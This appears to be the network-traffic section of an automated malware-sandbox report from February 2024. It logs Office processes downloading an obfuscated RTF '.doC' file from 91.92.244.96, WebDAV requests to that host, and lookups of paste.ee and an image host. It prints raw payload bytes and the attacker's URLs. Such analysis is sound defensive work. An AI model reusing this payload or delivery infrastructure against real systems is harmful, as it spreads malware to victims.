                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                  Feb 14, 2024 08:29:52.972652912 CET8.8.8.8192.168.2.220x1f81No error (0)paste.ee104.21.84.67A (IP address)IN (0x0001)false
                                                  Feb 14, 2024 08:29:52.972652912 CET8.8.8.8192.168.2.220x1f81No error (0)paste.ee172.67.187.200A (IP address)IN (0x0001)false
                                                  Feb 14, 2024 08:29:53.085058928 CET8.8.8.8192.168.2.220x7529No error (0)paste.ee104.21.84.67A (IP address)IN (0x0001)false
                                                  Feb 14, 2024 08:29:53.085058928 CET8.8.8.8192.168.2.220x7529No error (0)paste.ee172.67.187.200A (IP address)IN (0x0001)false
                                                  Feb 14, 2024 08:29:56.833672047 CET8.8.8.8192.168.2.220xbff8No error (0)uploaddeimagens.com.br104.21.45.138A (IP address)IN (0x0001)false
                                                  Feb 14, 2024 08:29:56.833672047 CET8.8.8.8192.168.2.220xbff8No error (0)uploaddeimagens.com.br172.67.215.45A (IP address)IN (0x0001)false

                                                  HTTP Request Dependency Graph

                                                  • paste.ee
                                                  • uploaddeimagens.com.br
                                                  • 91.92.244.96

                                                  HTTP Packets

                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  0192.168.2.224916291.92.244.96801892C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  TimestampBytes transferredDirectionData
                                                  Feb 14, 2024 08:29:43.676589012 CET432OUTGET /agh/mcirosfotupdatednewbabyprojectrelatedballonupdationtoimprovethenewupdationfasterthanbeforetoentirepcupday.doC HTTP/1.1
                                                  Accept: */*
                                                  UA-CPU: AMD64
                                                  Accept-Encoding: gzip, deflate
                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                  Host: 91.92.244.96
                                                  Connection: Keep-Alive
                                                  Feb 14, 2024 08:29:43.874193907 CET1286INHTTP/1.1 200 OK
                                                  Date: Wed, 14 Feb 2024 07:29:43 GMT
                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                  Last-Modified: Tue, 13 Feb 2024 00:59:02 GMT
                                                  ETag: "1083b-61138e6782878"
                                                  Accept-Ranges: bytes
                                                  Content-Length: 67643
                                                  Keep-Alive: timeout=5, max=100
                                                  Connection: Keep-Alive
                                                  Content-Type: application/msword
                                                  Data Raw: 7b 5c 72 74 0d 0d 0d 09 09 09 09 7b 5c 2a 5c 6d 7a 65 72 6f 41 73 63 38 35 39 31 38 35 38 31 30 20 5c 2b 7d 0d 7b 5c 31 39 36 37 38 34 39 36 39 2a a7 32 25 2d 5d 35 38 2c 3a 36 5f 2d 26 7c 39 b0 7c 3b 2b 2f 2f 5d a7 3d 26 5f 3e 40 2e 37 3f 33 7e 21 b0 a7 32 5d 34 2c 39 b0 60 3f 24 24 38 25 b0 38 33 3f 2b 7e 32 33 5e b0 a7 3f 3f 24 40 5e 3c 27 25 3f 3f 21 25 32 2d 3f 38 24 60 3f 25 3d 31 5f 35 3e 60 30 23 38 25 30 7e 2f 3f 28 a7 2e 5d 3d 2a 3a 7c 3f 3a 3b 3f 21 2c 3c 31 2a b5 a7 3b 31 b0 29 30 3b 5b 3f 5b 5e 24 3f 2e 21 a7 a7 38 28 2e 3f 34 38 5b 32 35 37 5e 5b 3f 3d 30 3f 2c 30 a7 38 28 37 25 2a 5d 2a 60 2e 5f 2b 30 3f 35 30 36 60 2e 2c 34 31 21 3f 7c 39 a7 3f 3c 3f 36 3f 23 39 24 b5 3f 5f 2e 26 b5 39 3f 38 24 29 25 29 34 3a 29 39 39 29 5d 5d 33 24 60 40 23 31 2a 5b 21 3f 38 21 29 b5 25 5e 36 2a b5 7e 3f 3f 2b 28 28 3f 3f 2d 33 3f 36 7e 5f 2c 3f b0 2e 39 34 40 26 31 2e 31 3f 37 32 3d 3f 2e 3f b0 2b 3f 31 25 2e 60 60 39 2a 25 21 3d 24 5e b5 2e 7c 34 28 27 2e 23 b5 29 7c 2d 7e 2c 31 3a 5d 21 37 3e 21 2e 60 3a 60 5f 29 3d b5 7e b5 7c 2d b0 3e 3c 3f 25 b5 2e 7e 5e 3e 7e 5d a7 21 3f 29 7e 5b 3c 37 30 2f 5e 39 2e b5 3c 2c 21 23 3b 3f 7e b5 35 7c 25 2f 5e b5 25 23 3f 2f 2e 27 2b 2c 40 3f 5b 5e 3f 37 29 3c 3e 3f 40 27 5d 5f 35 2a 24 5d 25 3e 28 39 3d 26 3f 36 23 37 60 3a 26 24 26 23 21 2d 25 3f 27 3f 37 3a 33 5b 28 34 29 3e b5 5f 40 2f 2a 32 2e 2e 2d 36 33 25 34 33 3a 2b 25 35 2d 28 3f 3b 23 28 32 3c 2c 3f 34 3a 7c 2d 5d 3f b0 2d 3e 2f 3e 3e b5 3f 3f 38 3f 3d 3f 5d 2b 3f 29 32 35 25 21 32 3f 3a 5b 30 2e 37 5b 27 3a 3c b0 38 2b 3f 35 7c a7 2c 34 35 29 2f 34 5d 27 3c 7c 5f 2c 21 a7 39 3e 33 23 29 7e 2c 5e 35 b5 3a 2a 37 b5 38 2a 39 30 2a 31 38 5e 60 5f 33 2e b0 3f 3f 34 21 34 5b 34 3f 3b b0 40 5b 36 3d 30 24 25 3f b5 2f 3f 39 7e 3f 27 3f 3a 5b 2d 36 3e 33 5d 27 3f 3f 7e 3f 31 5d 2b 31 5d 3d 38 b0 7e 24 35 3b a7 26 5b 29 3f 2d 34 2d b0 3d 3f 28 30 7e 5e 3b 2d 5f 2d 30 25 a7 40 37 5f 2b 5d 3a 28 7e 3b 36 2a 2a 35 40 37 21 24 a7 2f 27 28 2c 39 3d 38 37 37 3c 34 b5 2e 5f 2a 3b 5d 7e 3c 34 3f 2d 60 3f 7c 2f a7 28 a7 3c 7c 35 3b 3e 29 32 3c 5e 5d 25 3f 7e 36 2c 3e 28 5f 38 23 31 3f 3f 25 5d b0 37 27 3a 21 3f 3a 5f 3e b5 60 3f 25 35 5f 31 3f 3b 3b 35 7e 23 2c 7e 2b 2b 3f 26 5f a7 2c 27 5f 5b b0 7e 3e 5f 34 2c 7c 3f 5d 5d 38 40 b0 a7 60 2c 35 3f 3a 26 21 7e 2d 25 36 31 3f 23 31 5f 25 a7 3a 60 21 30 60 28 2b 33 3f 35 3f 40 37 23 3f 5b 26 7e 2b 30 7e 27 b0 b0 23 38 37 5f 3c 3f 3c 2b a7 5d 2d 7e 25 39 7e 3c b5 3a b5 26 40 2c 3f 26 3e 3f 2f 2d 24 7c 38 27 7c 3f 32 3c 3f 3f 3f 5f 3f 3f 3f 5f 5d 25 30 2e 2a 23 31 40 23 3e 60 2d b5 21 23 7c 7e 3b 3a 23 2e 5b 32 40 36 3f 39 3b 34 3a 2d 2e 3f 23 b5 2a 32 30 25 3f 2d 21 a7 3c 39 3f 35 60 3e 3c 35 3b 25 35 5e 3f 23 2e 5b 23 31 25 2c 28 7e b0 24 60 35 7e 2f 2b 2e 34 3b 5f 3f 32 29 7c 28 40 7e 31 3c 5e 3a 2c 38 7c 3b 2d a7 3f 3f 33 40 40 32 28 7e 30 40 39 3b 3b 26 b5 31 28 21 28 2a 2e 2c 37 35 29 5f 3f 3a 38 3b 29 37 30
                                                  Data Ascii: {\rt{\*\mzeroAsc859185810 \+}{\196784969*2%-]58,:6_-&|9|;+//]=&_>@.7?3~!2]4,9`?$$8%83?+~23^??$@^<'%??!%2-?8$`?%=1_5>`0#8%0~/?(.]=*:|?:;?!,<1*;1)0;[?[^$?.!8(.?48[257^[?=0?,08(7%*]*`._+0?506`.,41!?|9?<?6?#9$?_.&9?8$)%)4:)99)]]3$`@#1*[!?8!)%^6*~??+((??-3?6~_,?.94@&1.1?72=?.?+?1%.``9*%!=$^.|4('.#)|-~,1:]!7>!.`:`_)=~|-><?%.~^>~]!?)~[<70/^9.<,!#;?~5|%/^%#?/.'+,@?[^?7)<>?@']_5*$]%>(9=&?6#7`:&$&#!-%?'?7:3[(4)>_@/*2..-63%43:+%5-(?;#(2<,?4:|-]?->/>>??8?=?]+?)25%!2?:[0.7[':<8+?5|,45)/4]'<|_,!9>3#)~,^5:*78*90*18^`_3.??4!4[4?;@[6=0$%?/?9~?'?:[-6>3]'??~?1]+1]=8~$5;&[)?-4-=?(0~^;-_-0%@7_+]:(~;6**5@7!$/'(,9=877<4._*;]~<4?-`?|/(<|5;>)2<^]%?~6,>(_8#1??%]7':!?:_>`?%5_1?;;5~#,~++?&_,'_[~>_4,|?]]8@`,5?:&!~-%61?#1_%:`!0`(+3?5?@7#?[&~+0~'#87_<?<+]-~%9~<:&@,?&>?/-$|8'|?2<???_???_]%0.*#1@#>`-!#|~;:#.[2@6?9;4:-.?#*20%?-!<9?5`><5;%5^?#.[#1%,(~$`5~/+.4;_?2)|(@~1<^:,8|;-??3@@2(~0@9;;&1(!(*.,75)_?:8;)70
                                                  Feb 14, 2024 08:29:43.874218941 CET1286INData Raw: 3f 34 2d 2d 3f 3e 40 30 28 2f 27 3c 32 23 3e 7c 3a 2c 29 3f 28 33 25 24 26 30 23 b0 34 23 2d 30 38 2c 28 38 b0 3f 3a 26 2f 3d 26 2e 3f 7c 3d 3f b5 21 7c 29 2e 21 a7 60 7c 34 a7 35 27 29 39 3c 5d 5b 3f 3a 34 60 2c 3f 37 60 33 5b 2a 3f 60 32 33 3f
                                                  Data Ascii: ?4--?>@0(/'<2#>|:,)?(3%$&0#4#-08,(8?:&/=&.?|=?!|).!`|45')9<][?:4`,?7`3[*?`23???!%?`2]>`?(|$#46#)5&~:1,~.?'++>?!&0`6&;+`#9'%8.@^%/?#5^-#?.`&:`3#4/?'0;%*!_0?*.0_`.^,/??1,>?#,1?/!-?5%192?#,%3?;8|?(2<#;5['?96@&)+'??@?]%?7?>?0?0~2`^?~]#4
                                                  Feb 14, 2024 08:29:43.874233007 CET1286INData Raw: 29 3b 3f 25 5d 5d b5 7c 36 2c b5 3d 7e 5f 40 37 3a 2c 2e 3f 3e 5d 30 7e 2a 2a 38 7c 7e 5f 40 3f 5e 21 32 5d 7c 2c 23 5b 30 3d 3f 3f b0 37 2e 2f 24 b5 2f 3c 32 b5 5e 3e 2b 2b 2f 2f 25 38 3a 25 39 3b 37 26 3a 30 b5 3f 24 27 2a 27 3e 3f 3f 60 23 5f
                                                  Data Ascii: );?%]]|6,=~_@7:,.?>]0~**8|~_@?^!2]|,#[0=??7./$/<2^>++//%8:%9;7&:0?$'*'>??`#_4&>~4'.:--/_[6|))?#2%~.?!3?'!3$?~]^~@.>?0:?3,5(]?+=2^,(0%4?$3+?^/-_?%4@>^%+?9]:_,&1-?#,@:8=%;-?[?^.>&||/:&>=14??[%?=9'?~9[;27|@8!$@)[/?6@0,`?]?_?7]
                                                  Feb 14, 2024 08:29:43.874248028 CET1286INData Raw: 7e 36 26 3f 37 60 29 29 30 25 2f 3f 3d 27 25 37 38 24 3f 3f 3f 40 3d 2f 7c 3c 7e 36 b0 40 2e a7 32 38 39 29 2c 3f 5f 5f 26 2a 28 33 33 34 2d a7 35 26 7c 2e 29 2e 7c 28 25 5d 21 5d 28 37 36 31 25 2b 23 26 25 b5 35 7e 3a 3f 30 5f 28 3c 39 2e 28 3e
                                                  Data Ascii: ~6&?7`))0%/?='%78$???@=/|<~6@.289),?__&*(334-5&|.).|(%]!](761%+#&%5~:?0_(<9.(>:(4`]!%#99;;]!7?_,4%%%2;]6&?`?,$>.4%075:8;]%@?!?`[%<13-?%4(*%?#)|2,(~_%>|,<'94`<<#?@~*+#?(|4??=,#?5($=[?-=(?!.89|<?0.:;|>'(4?=??'_<'%7*9_;?~??~$$]5!)|.
                                                  Feb 14, 2024 08:29:43.874264956 CET1286INData Raw: 2f 2f 2c 2b 21 39 3a 38 25 5d 3c 25 7e b5 2e 23 29 a7 32 3d 29 5f 2b 7c 33 60 3f 31 3f 3f 60 5f 5d 26 23 3a 3f 3e 3c 3b 7c 5b 36 34 34 36 2f a7 b0 37 40 3b 3f 7e 5d 25 3e 39 36 3d 2e 3f 5e 26 5e 32 24 3b 3e 60 5e 23 2a b0 39 a7 2a 5d 3d 25 37 60
                                                  Data Ascii: //,+!9:8%]<%~.#)2=)_+|3`?1??`_]&#:?><;|[6446/7@;?~]%>96=.?^&^2$;>`^#*9*]=%7`9`.?1%@?$#(/3;|-/`%**|;@,|/.>-=-~:?]?9%5?|9:?+`/31??7?:.%^_12,9$+`~#??:/@9<,|%(%+<_?;+9/)<>2!:?#=^)8?..,+1%=7?]!_?74^?',5?;*;8:2!6;]~?-=?').?2(
                                                  Feb 14, 2024 08:29:43.874278069 CET1286INData Raw: 35 38 09 20 20 20 20 09 20 09 20 09 20 09 09 09 09 20 20 09 09 09 20 09 36 0a 0a 0d 0a 31 0a 0a 0a 0a 37 33 0a 0a 0a 0a 35 0a 0a 0a 0a 30 35 20 09 09 09 20 20 09 20 20 20 20 09 20 09 09 20 20 09 09 09 20 09 31 0d 0d 0a 0a 36 61 0d 0d 0a 0a 34 0a
                                                  Data Ascii: 58 6173505 16a4b 6 a 6f 7944656e584 c
                                                  Feb 14, 2024 08:29:43.874289989 CET1286INData Raw: 20 09 09 09 09 09 09 09 20 09 20 20 09 09 31 09 20 20 09 09 20 20 20 20 09 09 09 09 09 09 09 20 09 20 20 09 09 30 0d 0a 0d 0a 30 0a 0d 0d 0d 30 09 20 20 20 20 20 09 09 20 09 20 20 20 09 09 09 20 09 20 20 09 09 30 0a 0d 0d 0d 30 0a 0a 0a 0a 30 32
                                                  Data Ascii: 1 000 00020 000 000 1000000fefffff f000000000000000
                                                  Feb 14, 2024 08:29:43.874301910 CET1286INData Raw: 66 66 66 09 09 20 20 20 09 20 09 09 09 09 09 09 09 09 09 09 09 09 20 09 09 66 66 0a 0d 0a 0a 66 20 09 20 20 20 09 20 09 09 09 09 09 09 09 09 09 09 09 09 20 09 09 66 66 66 66 66 20 09 09 20 20 09 20 20 09 09 20 20 20 20 20 20 09 09 09 20 09 09 66
                                                  Data Ascii: fff fff fffff ffffff ff fffff f ffffff ffff
                                                  Feb 14, 2024 08:29:43.874314070 CET1286INData Raw: 20 09 20 20 20 20 09 09 20 09 09 20 20 09 20 20 09 09 66 66 0a 0d 0d 0d 66 09 09 09 09 20 20 09 20 20 20 09 09 20 09 09 20 20 09 20 20 09 09 66 66 66 66 66 66 66 0a 0a 0a 0d 66 09 09 09 20 09 20 20 20 09 20 09 20 20 09 09 20 20 09 20 20 09 09 66
                                                  Data Ascii: fff ffffffff f ffffffffffffffffff ff f fff f
                                                  Feb 14, 2024 08:29:43.874326944 CET1286INData Raw: 20 20 09 09 09 09 20 20 09 09 20 09 20 09 66 66 20 20 20 09 09 20 20 09 09 09 20 09 09 09 20 20 09 09 20 09 20 09 66 20 09 20 09 20 20 09 20 09 20 09 20 20 09 20 09 20 09 09 09 20 09 66 0d 0d 0a 0d 66 66 66 66 0d 0a 0a 0d 66 0a 0a 0a 0a 66 0d 0a
                                                  Data Ascii: ff f ffffffff ff fffff ffff f fff
                                                  Feb 14, 2024 08:29:44.068391085 CET1286INData Raw: 66 66 66 09 09 09 09 09 09 20 09 09 20 20 09 20 20 20 20 20 09 09 09 09 09 66 66 20 20 20 09 20 09 09 20 09 09 09 20 09 09 20 20 20 09 09 09 09 09 66 0d 0a 0a 0d 66 20 09 09 20 20 09 20 09 09 09 20 09 09 20 09 20 20 20 09 09 09 09 66 0a 0a 0a 0d
                                                  Data Ascii: fff ff ff ffffff fffff ffff f ffffff f


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  1192.168.2.224916391.92.244.96802596C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  TimestampBytes transferredDirectionData
                                                  Feb 14, 2024 08:29:44.781776905 CET138OUTOPTIONS /agh/ HTTP/1.1
                                                  User-Agent: Microsoft Office Protocol Discovery
                                                  Host: 91.92.244.96
                                                  Content-Length: 0
                                                  Connection: Keep-Alive
                                                  Feb 14, 2024 08:29:44.980596066 CET253INHTTP/1.1 200 OK
                                                  Date: Wed, 14 Feb 2024 07:29:44 GMT
                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                  X-Powered-By: PHP/8.2.12
                                                  Content-Length: 0
                                                  Keep-Alive: timeout=5, max=100
                                                  Connection: Keep-Alive
                                                  Content-Type: text/html; charset=UTF-8


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  2192.168.2.224916491.92.244.96802596C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  TimestampBytes transferredDirectionData
                                                  Feb 14, 2024 08:29:45.635461092 CET226OUTHEAD /agh/mcirosfotupdatednewbabyprojectrelatedballonupdationtoimprovethenewupdationfasterthanbeforetoentirepcupday.doC HTTP/1.1
                                                  Connection: Keep-Alive
                                                  User-Agent: Microsoft Office Existence Discovery
                                                  Host: 91.92.244.96
                                                  Feb 14, 2024 08:29:45.830260038 CET322INHTTP/1.1 200 OK
                                                  Date: Wed, 14 Feb 2024 07:29:45 GMT
                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                  Last-Modified: Tue, 13 Feb 2024 00:59:02 GMT
                                                  ETag: "1083b-61138e6782878"
                                                  Accept-Ranges: bytes
                                                  Content-Length: 67643
                                                  Keep-Alive: timeout=5, max=100
                                                  Connection: Keep-Alive
                                                  Content-Type: application/msword


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3192.168.2.224916691.92.244.9680
                                                  TimestampBytes transferredDirectionData
                                                  Feb 14, 2024 08:29:49.306622982 CET132OUTOPTIONS /agh HTTP/1.1
                                                  Connection: Keep-Alive
                                                  User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
                                                  translate: f
                                                  Host: 91.92.244.96
                                                  Feb 14, 2024 08:29:49.504929066 CET619INHTTP/1.1 301 Moved Permanently
                                                  Date: Wed, 14 Feb 2024 07:29:49 GMT
                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                  Location: http://91.92.244.96/agh/
                                                  Content-Length: 334
                                                  Keep-Alive: timeout=5, max=100
                                                  Connection: Keep-Alive
                                                  Content-Type: text/html; charset=iso-8859-1
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 39 31 2e 39 32 2e 32 34 34 2e 39 36 2f 61 67 68 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 33 2e 31 2e 33 20 50 48 50 2f 38 2e 32 2e 31 32 20 53 65 72 76 65 72 20 61 74 20 39 31 2e 39 32 2e 32 34 34 2e 39 36 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://91.92.244.96/agh/">here</a>.</p><hr><address>Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 Server at 91.92.244.96 Port 80</address></body></html>
                                                  Feb 14, 2024 08:29:49.507358074 CET133OUTOPTIONS /agh/ HTTP/1.1
                                                  Connection: Keep-Alive
                                                  User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
                                                  translate: f
                                                  Host: 91.92.244.96
                                                  Feb 14, 2024 08:29:49.705286026 CET252INHTTP/1.1 200 OK
                                                  Date: Wed, 14 Feb 2024 07:29:49 GMT
                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                  X-Powered-By: PHP/8.2.12
                                                  Content-Length: 0
                                                  Keep-Alive: timeout=5, max=99
                                                  Connection: Keep-Alive
                                                  Content-Type: text/html; charset=UTF-8
                                                  Feb 14, 2024 08:29:49.936688900 CET162OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 61 67 68 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52
                                                  Data Ascii: PROPFIND /agh HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: 91.92.244.96
                                                  Feb 14, 2024 08:29:50.132791996 CET618INHTTP/1.1 301 Moved Permanently
                                                  Date: Wed, 14 Feb 2024 07:29:50 GMT
                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                  Location: http://91.92.244.96/agh/
                                                  Content-Length: 334
                                                  Keep-Alive: timeout=5, max=98
                                                  Connection: Keep-Alive
                                                  Content-Type: text/html; charset=iso-8859-1
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 39 31 2e 39 32 2e 32 34 34 2e 39 36 2f 61 67 68 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 33 2e 31 2e 33 20 50 48 50 2f 38 2e 32 2e 31 32 20 53 65 72 76 65 72 20 61 74 20 39 31 2e 39 32 2e 32 34 34 2e 39 36 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://91.92.244.96/agh/">here</a>.</p><hr><address>Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 Server at 91.92.244.96 Port 80</address></body></html>
                                                  Feb 14, 2024 08:29:50.133172989 CET163OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 61 67 68 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69
                                                  Data Ascii: PROPFIND /agh/ HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: 91.92.244.96
                                                  Feb 14, 2024 08:29:50.329579115 CET252INHTTP/1.1 200 OK
                                                  Date: Wed, 14 Feb 2024 07:29:50 GMT
                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                  X-Powered-By: PHP/8.2.12
                                                  Content-Length: 0
                                                  Keep-Alive: timeout=5, max=97
                                                  Connection: Keep-Alive
                                                  Content-Type: text/html; charset=UTF-8
                                                  Feb 14, 2024 08:29:50.627036095 CET162OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 61 67 68 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52
                                                  Data Ascii: PROPFIND /agh HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: 91.92.244.96
                                                  Feb 14, 2024 08:29:50.822952986 CET618INHTTP/1.1 301 Moved Permanently
                                                  Date: Wed, 14 Feb 2024 07:29:50 GMT
                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                  Location: http://91.92.244.96/agh/
                                                  Content-Length: 334
                                                  Keep-Alive: timeout=5, max=96
                                                  Connection: Keep-Alive
                                                  Content-Type: text/html; charset=iso-8859-1
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 39 31 2e 39 32 2e 32 34 34 2e 39 36 2f 61 67 68 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 33 2e 31 2e 33 20 50 48 50 2f 38 2e 32 2e 31 32 20 53 65 72 76 65 72 20 61 74 20 39 31 2e 39 32 2e 32 34 34 2e 39 36 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://91.92.244.96/agh/">here</a>.</p><hr><address>Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 Server at 91.92.244.96 Port 80</address></body></html>
                                                  Feb 14, 2024 08:29:50.823230028 CET163OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 61 67 68 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69
                                                  Data Ascii: PROPFIND /agh/ HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: 91.92.244.96
                                                  Feb 14, 2024 08:29:51.019599915 CET252INHTTP/1.1 200 OK
                                                  Date: Wed, 14 Feb 2024 07:29:50 GMT
                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                  X-Powered-By: PHP/8.2.12
                                                  Content-Length: 0
                                                  Keep-Alive: timeout=5, max=95
                                                  Connection: Keep-Alive
                                                  Content-Type: text/html; charset=UTF-8
                                                  Feb 14, 2024 08:29:55.128276110 CET159OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69
